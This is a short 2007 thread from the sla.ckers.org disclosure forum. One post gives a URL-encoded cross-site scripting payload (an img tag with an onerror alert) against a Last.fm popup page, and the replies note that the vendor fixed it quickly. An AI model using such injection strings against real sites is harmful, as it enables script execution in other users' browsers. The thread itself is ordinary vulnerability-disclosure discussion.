Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Last FM XSS
Posted by: jungsonn
Date: February 02, 2007 10:15AM

Thought that it would be funny:

http://www.last.fm/webclient/popup/?radioURL=%22%22%3E%3Cimg%20src=%22sfsdfs%22%20onerror=%22javascript:alert('xss')%22%20%3C%22%3E

I already contacted LAST FM; if they are quick, it will be fixed soon.

Re: Last FM XSS
Posted by: Anonymous User
Date: February 02, 2007 02:08PM

fixed

Re: Last FM XSS
Posted by: Kyran
Date: February 02, 2007 03:10PM

I've disclosed a few to them. They are usually REALLY quick. =)

- Kyran

Re: Last FM XSS
Posted by: jungsonn
Date: February 03, 2007 03:43AM

That's quick, and on a Friday also :)

@Kyran

Wow... seems they only patch the ones that get submitted to them?
We should be asking money for these things damn... another freebie. :)
